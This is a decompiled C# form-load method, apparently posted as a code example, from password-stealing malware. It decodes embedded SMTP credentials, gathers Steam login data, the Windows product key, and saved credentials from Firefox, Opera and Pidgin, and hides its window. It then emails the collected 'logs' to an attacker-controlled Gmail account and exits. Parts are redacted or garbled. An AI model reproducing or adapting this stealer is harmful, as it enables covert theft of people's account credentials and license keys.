Exemple #1
0
    // Token: 0x06000071 RID: 113 RVA: 0x00004590 File Offset: 0x00002790
    private void Form1_Load(object sender, EventArgs e)
    {
        Environment.GetEnvironmentVariable("PROGRAMFILES") + "\\Mozilla Firefox\\firefox.exe";
        string text = this.method_0();

        string[] array = text.Split(new char[]
        {
            '^'
        });
        string text2    = this.method_3(array[0], "Deceptiveisgay", true);
        string password = this.method_3(array[1], "Deceptiveisgay", true);
        string left     = array[2];

        if (Operators.CompareString(left, "1", false) == 0)
        {
            try
            {
                this.method_4();
            }
            catch (Exception ex)
            {
            }
        }
        TextBox textBox = this.TextBox1;

        textBox.Text = textBox.Text + ">>>>>>>>>>Steam<<<<<<<<<<" + Environment.NewLine;
        try
        {
            textBox      = this.TextBox1;
            textBox.Text = textBox.Text + "Username: "******"\r\n";
        textBox       = this.TextBox1;
        textBox.Text += "\r\n";
        textBox       = this.TextBox1;
        textBox.Text  = textBox.Text + ">>>>>>>>>>Windows Key<<<<<<<<<<" + Environment.NewLine;
        textBox       = this.TextBox1;
        textBox.Text += Class9.smethod_0();
        textBox       = this.TextBox1;
        textBox.Text += "\r\n";
        try
        {
            this.method_6();
        }
        catch (Exception ex3)
        {
        }
        textBox            = this.TextBox1;
        textBox.Text      += "\r\n";
        this.TextBox1.Text = this.TextBox1.Text + Environment.NewLine + ">>>>>>>>>>FireFox<<<<<<<<<<";
        try
        {
            this.method_5();
        }
        catch (Exception ex4)
        {
        }
        try
        {
            Class4.smethod_0();
        }
        catch (Exception ex5)
        {
        }
        textBox       = this.TextBox1;
        textBox.Text += "\r\n";
        textBox       = this.TextBox1;
        textBox.Text  = textBox.Text + ">>>>>>>>>>Opera<<<<<<<<<<" + Environment.NewLine;
        try
        {
            GClass1 gclass = new GClass1();
            gclass.method_0();
        }
        catch (Exception ex6)
        {
        }
        textBox       = this.TextBox1;
        textBox.Text += "\r\n";
        textBox       = this.TextBox1;
        textBox.Text  = textBox.Text + ">>>>>>>>>>Pidgin<<<<<<<<<<" + Environment.NewLine;
        try
        {
            textBox      = this.TextBox1;
            textBox.Text = Conversions.ToString(Operators.AddObject(textBox.Text, GClass2.smethod_1()));
        }
        catch (Exception ex7)
        {
        }
        textBox       = this.TextBox1;
        textBox.Text += "\r\n";
        this.Visible  = false;
        this.Hide();
        this.ShowInTaskbar = false;
        MailMessage mailMessage = new MailMessage();
        SmtpClient  smtpClient  = new SmtpClient();

        smtpClient.Credentials = new NetworkCredential(text2, password);
        smtpClient.Port        = 587;
        smtpClient.Host        = "smtp.gmail.com";
        smtpClient.EnableSsl   = true;
        mailMessage            = new MailMessage();
        try
        {
            mailMessage.To.Add(text2);
            mailMessage.From    = new MailAddress("*****@*****.**", "New Logs Received!", Encoding.UTF8);
            mailMessage.Subject = Class1.Class0_0.Name + "   " + Conversions.ToString(DateTime.Now) + ":";
            mailMessage.Body    = this.TextBox1.Text;
            mailMessage.DeliveryNotificationOptions = DeliveryNotificationOptions.OnFailure;
            smtpClient.Send(mailMessage);
        }
        catch (Exception ex8)
        {
        }
        Application.Exit();
    }